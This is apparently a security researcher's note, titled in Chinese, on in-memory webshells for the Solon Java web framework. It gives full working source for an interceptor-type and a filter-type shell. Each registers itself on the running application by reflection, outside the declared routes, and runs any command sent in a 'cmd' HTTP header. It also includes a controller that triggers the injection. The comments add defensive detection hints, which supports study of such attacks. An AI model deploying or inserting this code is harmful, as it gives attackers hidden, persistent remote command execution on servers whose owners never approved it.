Solon内存马Note


RouterInterceptor型

  • Shell实例
package org.example.filter;

import org.noear.snack.core.utils.StringUtil;
import org.noear.solon.Solon;
import org.noear.solon.SolonApp;
import org.noear.solon.core.ChainManager;
import org.noear.solon.core.handle.Context;
import org.noear.solon.core.handle.Handler;
import org.noear.solon.core.route.RouterInterceptor;
import org.noear.solon.core.route.RouterInterceptorChain;

import java.io.InputStream;
import java.lang.reflect.Field;
import java.util.Scanner;

/**
 * Demonstration "memory shell" from this note: a {@link RouterInterceptor} that registers itself
 * on the running Solon application when the class is initialized, and then runs the value of the
 * {@code cmd} request header as an operating-system command.
 *
 * <p>Reviewer notes (defensive): the registration is made by reflection on the live
 * {@code ChainManager}; nothing in this class adds it through configuration or annotations, so
 * it will not show up in a review of the application's declared routes. What this code makes
 * observable is: an interceptor on the chain manager that the application does not declare,
 * reflective access to {@code _chainManager}, child processes started by the JVM, and requests
 * that carry a {@code cmd} header.
 */
public class Shell implements RouterInterceptor {

    // Runs once, when the class is initialized (in this note, via Class.forName).
    static {
        try {
            SolonApp app = Solon.app();
            // The field is looked up on the superclass of the app's runtime class and read by
            // reflection with access checks disabled.
            Field chainManager = app.getClass().getSuperclass().getDeclaredField("_chainManager");
            chainManager.setAccessible(true);
            ChainManager o = (ChainManager) chainManager.get(app);
            // Registers a new instance on the live chain manager. The second argument (1) is
            // presumably the ordering index -- confirm against ChainManager.addInterceptor.
            o.addInterceptor(new Shell(),1);
        } catch (NoSuchFieldException e) {
            // Both exceptions can only be raised before addInterceptor is reached, so a failure
            // here means nothing was registered; the only trace is the stack trace on stderr.
            e.printStackTrace();
        } catch (IllegalAccessException e) {
            e.printStackTrace();
        }
    }
    /**
     * Intercepts a routed request; when the {@code cmd} header is non-empty its value is executed
     * and the process's standard output is written to the response.
     *
     * <p>No authentication or allow-list check is applied to the header value in this method.
     * The request is handed to the rest of the chain afterwards in either case, so the
     * application's normal handling still runs.
     *
     * @param ctx         the request/response context the header is read from and output written to
     * @param mainHandler the handler passed on unchanged to the chain
     * @param chain       the remaining interceptor chain
     * @throws Throwable  whatever the process launch, the response write or the chain raises
     */
    @Override
    public void doIntercept(Context ctx, Handler mainHandler, RouterInterceptorChain chain) throws Throwable {
        String cmd = ctx.header("cmd");
        if (!StringUtil.isEmpty(cmd)) {
            // Request-controlled string goes straight to Runtime.exec: remote command execution
            // with the privileges of the JVM process.
            InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();
            // "\\A" makes the Scanner return the whole stream as one token.
            Scanner s = new Scanner(in).useDelimiter("\\A");
            String output = s.hasNext() ? s.next() : "";
            // The command output is written to the response before the chain continues.
            ctx.output(output);
        }
        chain.doIntercept(ctx, mainHandler);
    }
}

  • Class.forName注入
package org.example.controller;

import org.noear.solon.annotation.Controller;
import org.noear.solon.annotation.Mapping;

/**
 * Demonstration trigger used in this note: a controller whose only endpoint loads the
 * {@code org.example.filter.Shell} class by name.
 *
 * <p>Reviewer notes (defensive): the class name is a hard-coded literal here, not request input.
 * No access check is visible on the endpoint in this block.
 */
@Controller
public class InjectController {
    /**
     * Handles {@code /Inject} by loading {@code org.example.filter.Shell}.
     *
     * <p>The single-argument {@code Class.forName} also initializes the class, so the target's
     * static initializer runs on the first call; class initialization happens once per class
     * loader, so later calls do not run it again.
     *
     * @return the fixed string {@code "success Inject!!!"}
     * @throws ClassNotFoundException if the named class cannot be found
     */
    @Mapping("/Inject")
    public String inject() throws ClassNotFoundException {
        Class.forName("org.example.filter.Shell");
        return "success Inject!!!";
    }
}


Filter型

  • Shell实例
package org.example.filter;

import org.noear.snack.core.utils.StringUtil;
import org.noear.solon.Solon;
import org.noear.solon.SolonApp;
import org.noear.solon.core.ChainManager;
import org.noear.solon.core.handle.Context;
import org.noear.solon.core.handle.Filter;
import org.noear.solon.core.handle.FilterChain;

import java.io.InputStream;
import java.lang.reflect.Field;
import java.util.Scanner;

/**
 * Filter variant of the demonstration "memory shell" in this note: a {@link Filter} that
 * registers itself on the running Solon application when the class is initialized, and then runs
 * the value of the {@code cmd} request header as an operating-system command.
 *
 * <p>Reviewer notes (defensive): the filter is added by reflection on the live
 * {@code ChainManager}, not through configuration or annotations. What this code makes
 * observable is: a filter on the chain manager that the application does not declare, reflective
 * access to {@code _chainManager}, child processes started by the JVM, and requests that carry a
 * {@code cmd} header.
 */
public class FilterShell implements Filter {

    // Runs once, when the class is initialized.
    static {
        try {
            SolonApp app = Solon.app();
            // The field is looked up on the superclass of the app's runtime class and read by
            // reflection with access checks disabled.
            Field chainManager = app.getClass().getSuperclass().getDeclaredField("_chainManager");
            chainManager.setAccessible(true);
            ChainManager o = (ChainManager) chainManager.get(app);
            // Registers a new instance on the live chain manager. The second argument (1) is
            // presumably the ordering index -- confirm against ChainManager.addFilter.
            o.addFilter(new FilterShell(),1);
        } catch (NoSuchFieldException e) {
            // Both exceptions can only be raised before addFilter is reached, so a failure here
            // means nothing was registered; the only trace is the stack trace on stderr.
            e.printStackTrace();
        } catch (IllegalAccessException e) {
            e.printStackTrace();
        }
    }


    /**
     * Filters a request; when the {@code cmd} header is non-empty its value is executed and the
     * process's standard output is written to the response.
     *
     * <p>No authentication or allow-list check is applied to the header value in this method.
     * The request is handed to the rest of the filter chain afterwards in either case, so the
     * application's normal handling still runs.
     *
     * @param ctx   the request/response context the header is read from and output written to
     * @param chain the remaining filter chain
     * @throws Throwable whatever the process launch, the response write or the chain raises
     */
    @Override
    public void doFilter(Context ctx, FilterChain chain) throws Throwable {
        String cmd = ctx.header("cmd");
        if (!StringUtil.isEmpty(cmd)) {
            // Request-controlled string goes straight to Runtime.exec: remote command execution
            // with the privileges of the JVM process.
            InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();
            // "\\A" makes the Scanner return the whole stream as one token.
            Scanner s = new Scanner(in).useDelimiter("\\A");
            String output = s.hasNext() ? s.next() : "";
            // The command output is written to the response before the chain continues.
            ctx.output(output);
        }
        chain.doFilter(ctx);
    }
}